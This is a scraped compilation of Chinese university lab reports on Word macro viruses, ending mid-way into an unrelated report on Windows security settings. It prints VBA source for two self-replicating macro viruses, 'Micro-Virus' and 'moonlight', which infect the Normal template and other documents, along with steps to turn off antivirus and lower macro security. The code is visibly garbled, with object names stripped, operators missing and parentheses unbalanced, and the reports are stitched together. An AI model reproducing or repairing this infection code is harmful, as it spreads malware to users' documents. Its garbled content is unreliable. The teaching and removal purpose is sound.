关于宏病毒的实验报告的实验心得

1 / 25关于宏病毒的实验报告的实验心得华北电力大学科技学院实 验 报 告实验名称: 宏病毒实验课程名称:计算机病毒原理与防治专业班级：网络工程 10K2 学生姓名： meter号：1011155145451 成 绩：指导教师： 张少敏 实验日期：2016/10/22 | | | | 学第 页 共 页第 页 共 页第(转 载于: 海达 范文 网:关于宏病毒的实验报告的实验2 / 25心得) 页 共 页第 页 共 页计 算 机 病 毒实验报告姓 名：学 号:老 师：日 期：一. 实验目的Word 宏是指能组织到一起为独立命令使用的一系列 Word 指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认3 / 25识，提高防范意识。二. 实验内容1. macro virus 中的内容2. 信安实验平台-计算机病毒篇 -计算机宏病毒3. 结合杀毒软件如诺顿、卡巴斯基等，观察病毒查杀现象三. 实验环境1. macro virus硬件设备：局域网，终端 PC 机。系统软件：Windows 系列操作系统支撑软件：Word XX软件设置：关闭杀毒软；打开 Word XX，在工具?宏?安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择4 / 25信任任何所有安装的加载项和模板，选择信任 visual basic 项目的访问. 实验环境配置如下图所示：受感染终端被感染终端2.计算机宏病毒硬件设备：部署 WINXX 系统的 PC 机一台软件工具：Office wordXX四实验步骤及截图1.自我复制，感染 word 公用模板和当前文档打开一个 word 文档，然后按 Alt+F11 调用宏编写窗口,在左侧的 projectMicrosoft Word 对象 ThisDocument 中输入以上代码，保存，此时当前 word 文档就含有宏病毒只要下次打开这个 word 文档，就会执行以上代码，并将自身复制到和当前文档的 ThisDocument 中，同时改变函数名，此时所有的 word 文档打开和关闭时，都将运行以上的病毒5 / 25代码，可以加入适当的恶意代码，影响 word 的正常使用，本例中只是简单的跳出一个提示框。2.具有一定破坏性的宏我们可以对上例中的恶意代码稍加修改，使其具有一定的破坏性。 该病毒的效果如下：当打开被感染的 word 文档时，首先进行自我复制，感染 word 模板，然后检查日期，看是否是 1 日，然后跳出一个对话框，要求用户进行一次心算游戏，这里只用四个小于 10 的数相乘，如果作者的计算正确，那么就会新建一个文档，跳出如下字幕： 何谓宏病毒答案：我就是.实验报告 2姓名： 班级： 学号：实验题目：_实验二宏病毒实验_一、实验目的6 / 25了解宏的编写、宏的原理及其安全缺陷；理解宏病毒的作用机制。二、实验平台Windows 系列操作系统Word XX 应用程序三、实验步骤1、 软件设置：关闭杀毒软件的自动防护功能。2、 打开 Word XX，在工具?宏?安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任 visual basic 项目的访问。3、 打开一个 word 文档，然后按 Alt+F11 调用宏编写窗口，在左侧的 projectMicrosoft Word 对象?ThisDocument7 / 25中输入源代码，保存。4、 此时当前 word 文档就含有宏病毒，只要下次打开这个word 文档，就会执行以上代码，并将自身复制到和当前文档的 ThisDocument 中，同时改变函数名。此时所有的 word 文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word 的正常使用，本例中只是简单的跳出一个提示框。5、 对每一个受感染的 word 文档进行如下操作：打开受感染的 word 文档，进入宏编辑环境，打开Normal?Microsoft Word 对象?This Document，清除其中的病毒代码。然后打开 Project?Microsoft Word?This Document，清除其中的病毒代码。实际上，模板的病毒代码只要在处理最后一个受感染文件时清除即可，然而清除模板病毒后，如果重新打开其他已感染文件，模板将再次被感染，因此为了保证病毒被清除，可以查看每一个受感染文档的模板，如果存在病毒代码，都进行一次清除。6、 类台湾 1 号病毒实验：8 / 25对练习 1 的恶意代码稍加修改实验的源码参见 macro_”，使其具有一定的破坏性,观察、分析代码的原理，记录实验现象。7、 清除宏病毒：对每一个受感染的 word 文档进行如下操作：打开受感染的word 文档，进入宏编辑环境，打开 Normal?Microsoft Word 对象?This Document，清除其中的病毒代码。然后打开 Project?Microsoft Word?This Document，清除其中的病毒代码。实际上，模板的病毒代码只要在处理最后一个受感染文件时清除即可，然而清除模板病毒后，如果重新打开其他已感染文件，模板将再次被感染，因此为了保证病毒被清除，可以查看每一个受感染文档的模板，如果存在病毒代码，都进行一次清除。四、实验总结通过本次实验了解宏的编写、宏的原理及其安全缺陷；理解宏病毒的作用机制。9 / 25实验七 计算机宏病毒分析及清除实验一、实验目的? 了解“宏病毒”机理；? 掌握清除宏病毒的方法；? 掌握采用“宏”和脚本语言进行编程的技术。二、实验时数：2 小时三、实验环境? Windows 2000/XX/XP 或更高级别的 Windows 操作系统；? Office Word 2000/XX 等字处理软件。四、实验要求? 演示宏的编写；? 10 / 25理解宏病毒的作用机制。五、实验步骤：1软件设置关闭杀毒软件；打开 Word 字处理软件，在工具“宏”的“安全性”中，将“安全级”设置为低，在“可靠发行商”选项卡中，选择信任任何所有安装的加载项和模板，选择“信任 visual basic 项目的访问” 。注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的 word 文档，否则清除比较麻烦。2自我复制功能演示打开一个 word 文档，然后按 Alt+F11 调用宏编写窗口,在左侧的“projectMicrosoft Word”对象“ThisDocument”中输入以下代码，保存，此时当前 word文档就含有宏病毒，只要下次打开这个 word 文档，就会执行以上代码，并将自身复制到和当前文档的 ThisDocument11 / 25中，同时改变函数名，此时所有的 word 文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响 word 的正常使用，本例中只是简单的跳出一个提示框。完整代码如下：Macro-1：Micro-VirusSub Document_Open()On Error Resume Next= False= FalseSet ourcodemodule = (1).CodeModuleSet host = (1).CodeModuleIf ThisDocument = NormalTemplate Then12 / 25Set host = (1).CodeModuleEnd IfWith hostIf .Lines(1, 1) “Micro-Virus” Then.DeleteLines 1, .CountOfLines.InsertLines 1, (1, 100).ReplaceLine 2, “Sub Document_Close()”If ThisDocument = NormalTemplate Then.ReplaceLine 2, “Sub Document_Open()”End IfEnd If13 / 25End WithMsgBox “MicroVirus by Content Security Lab”End Sub以上代码的基本执行流程如下：1) 进行必要的自我保护:= False= False高明的病毒编写者其自我保护将做得非常好，可以使 word的一些工具栏失效，例如将工具菜单中的宏选项屏蔽，也可以修改注册表达到很好的隐藏效果。本例中只是屏蔽状态栏，以免显示宏的运行状态，并且修改公用模板时自动保存，不给用户提示。14 / 252) 得到当前文档的代码对象和公用模板的代码对象:Set ourcodemodule = (1).CodeModule Set host = (1).CodeModuleIf ThisDocument = NormalTemplate ThenSet host = (1).CodeModuleEnd If3) 检查模板是否已经感染病毒，如果没有，则复制宏病毒代码到模板，并且修改函数名:With HostIf .Lines() “Micro-Virus” Then.DeleteLines 1, .CountOfLines.InsertLines 1, Ourcode15 / 25.ReplaceLine 2, “Sub Document_Close()”If ThisDocument = nomaltemplate Then.ReplaceLine 2, “Sub Document_Open()”End IfEnd IfEnd With4) 执行恶意代码MsgBox “MicroVirus by Content Security Lab”3具有一定破坏性的宏我们可以对上例中的恶意代码稍加修改，使其具有一定的破坏性。16 / 25完整代码如下：Macro_2：moonlightDim nm(4)Sub Document_Open()DisableInput 1Set ourcodemodule = (1).CodeModuleSet host = (1).CodeModuleIf ThisDocument = NormalTemplate ThenSet host = (1).CodeModuleEnd IfWith host17 / 25If .Lines(1, 1) “moonlight” Then.DeleteLines 1, .CountOfLines.InsertLines 1, (1, 100).ReplaceLine 3, “Sub Document_Close()”If ThisDocument = NormalTemplate Then.ReplaceLine 3, “Sub Document_Open()”End IfEnd IfEnd WithCount = 0If Year(Now() = 2016 Then18 / 25try:On Error GoTo trytest = -1con = 1tog$ = “i = 0While test = -1For i = 0 To 4nm(i) = Int(Rnd() * 10)con = con * nm(i)If i = 4 Then19 / 25tog$ = tog$ + Str$(nm(4) + “=?”GoTo begEnd Iftog$ = tog$ + Str$(nm(i) + “*”Next ibeg:Beepans$ = InputBox$(“今天是” + Date$ + “,跟你玩一个心算游戏” + Chr$(13) + “若你答错，只好接受震撼教育.” + Chr$(13) + tog$, “台湾 Macro Virus”)If RTrim$(LTrim$(ans$) = LTrim$(Str$(con) Then20 / 25= wdAlignParagraphCenterBeepWith .Name = “细明体”.Size = 16.Bold = 1.Underline = 1End WithText:=“何谓宏病毒”BeepText:=“答案：”21 / 25= 1Text:=“我就是.”= 0网络安全实验报告学院 专业 实验室 指导教师 班级 姓名 学号： 计算机科学与技术学院 ： ： ：实验一 Windows2000 系统的安全配置月22 / 25实验题目：Windows 系统的安全配置 实验要求：对 Windows XP 系统进行基本的安全设置，了解各种设置的基本作用。实验环境操作系统环境：Windows98/NT/2000/XP 实验主要步骤：一、安全配置初级篇首先进入 开始-管理工具-计算机管理；进入本地用户和组，可以修改用户权限和去掉不常用的用户，修改Administrator 帐号名称和密码，去掉所有的测试帐户。用户组策略设置相应权限，并且经常检查系统的帐户，删除已经不使用的帐户。帐户很多是黑客们入侵系统的突破口，系统的帐户越多，黑客们得到合法用户的权限可能性一般也就越大。23 / 25(2 ) 陷阱帐号。创建一个名为“Administrator”的本地帐户，把它的权限设置成最低，什 么事情也干不了，并且加上一个超过 10 位的超级复杂密码。 在桌面单击鼠标右键